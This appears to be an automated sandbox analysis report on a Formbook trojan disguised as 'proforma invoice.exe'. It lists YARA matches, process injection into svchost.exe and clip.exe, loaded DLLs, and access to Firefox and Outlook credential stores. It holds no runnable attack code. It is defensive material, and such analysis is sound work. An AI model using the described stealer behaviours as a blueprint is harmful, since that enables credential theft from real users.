            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0501E4F6
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F8C6E0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F6C7C0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F70770
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F94750
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0500A118
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050241A2
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050301AA
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050281CC
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05002000
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FF8158
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F60100
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FF02C0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502A352
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050303E6
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F7E3F0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05010274
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F60CF2
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0500CD1F
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F70C00
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F6ADE0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F88DBF
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05010CB5
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F7AD00
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05012F30
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F82E90
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F70E59
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502EE26
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F62FC8
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FEEFA0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502CE93
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FE4F40
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F90F30
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FB2F28
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502EEDB
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F9E8F0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F568B8
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0503A9A6
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F72840
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F7A840
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F729A0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F86962
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502AB40
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F6EA80
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05026BD7
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05027571
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F61460
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0500D5B0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050395C3
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502F43F
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502F7B0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FB5630
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050216CC
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F770C0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0503B16B
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F7B1B0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F5F172
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FA516C
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0501F0CC
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502F0E0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050270E9
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F8D2F0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502132D
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F8B2C0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F752A0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FB739A
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F5D34C
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_050112ED
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05021D5A
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05027D73
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FE9C32
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F8FDC0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F73D40
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502FCF2
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502FF09
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F79EB0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502FFB1
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F33FD2
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F33FD5
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F71F92
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05005910
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F738E0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FDD800
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F79950
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F8B950
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FB5AA0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502FB76
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FE3A6C
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FADBF9
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04FE5BF0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05027A46
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0502FA49
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04F8FB80
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_05011AA3
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0500DAAC
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0501DAC6
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_03051720
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0306A280
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0304CB30
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0304ABB0
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0304C908
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0304C910
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_03053270
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04DFA43A
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04DFC0FC
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04DFB168
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04DFBC44
            Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04DFBD64
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03287E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0322B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032BF290 appears 103 times
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: String function: 00ABF9F2 appears 31 times
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: String function: 00AC0A30 appears 46 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04FA5130 appears 58 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04FDEA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04FEF290 appears 103 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04FB7E54 appears 107 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04F5B970 appears 262 times
            Source: proforma invoice.exe, 00000000.00000003.1652604160.00000000040ED000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs proforma invoice.exe
            Source: proforma invoice.exe, 00000000.00000003.1652825878.0000000003F43000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs proforma invoice.exe
            Source: proforma invoice.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/10
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B137B5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B010BF AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00AA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\proforma invoice.exe | File created: C:\Users\user\AppData\Local\Temp\autCF31.tmp
            Source: proforma invoice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\proforma invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: clip.exe, 00000003.00000003.2038941614.0000000003260000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003282000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2036675540.0000000003282000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2038941614.0000000003282000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: proforma invoice.exe | ReversingLabs: Detection: 28%
            Source: proforma invoice.exe | Virustotal: Detection: 29%
            Source: unknown | Process created: C:\Users\user\Desktop\proforma invoice.exe "C:\Users\user\Desktop\proforma invoice.exe"
            Source: C:\Users\user\Desktop\proforma invoice.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\proforma invoice.exe"
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\proforma invoice.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: proforma invoice.exe | Static file information: File size 1248256 > 1048576
            Source: proforma invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: proforma invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: proforma invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: proforma invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: proforma invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: proforma invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: proforma invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103470681.000000000056E000.00000002.00000001.01000000.00000004.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4103116967.000000000056E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: proforma invoice.exe, 00000000.00000003.1653485893.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, proforma invoice.exe, 00000000.00000003.1652243415.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1759986126.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761687857.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.0000000003200000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1851656992.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1849341364.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: proforma invoice.exe, 00000000.00000003.1653485893.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, proforma invoice.exe, 00000000.00000003.1652243415.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1759986126.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761687857.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.0000000003200000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000003.1851656992.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1849341364.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1849243613.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1817977068.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000003.1787838240.0000000000894000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4104507554.000000000555C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920600296.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B35C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4104507554.000000000555C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920600296.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B35C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1849243613.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1817977068.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000003.1787838240.0000000000894000.00000004.00000020.00020000.00000000.sdmp
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC0A76 push ecx; ret 0_2_00AC0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031C0 push eax; ret 1_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004161D3 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162CC push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417356 push ebx; retf 1_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416338 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004083DA push es; ret 1_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040BBEC pushad ; iretd 1_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418577 push 2823B84Bh; retf 1_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D38 push ecx; iretd 1_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E39 push esp; ret 1_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320225F pushad ; ret 1_2_032027F9
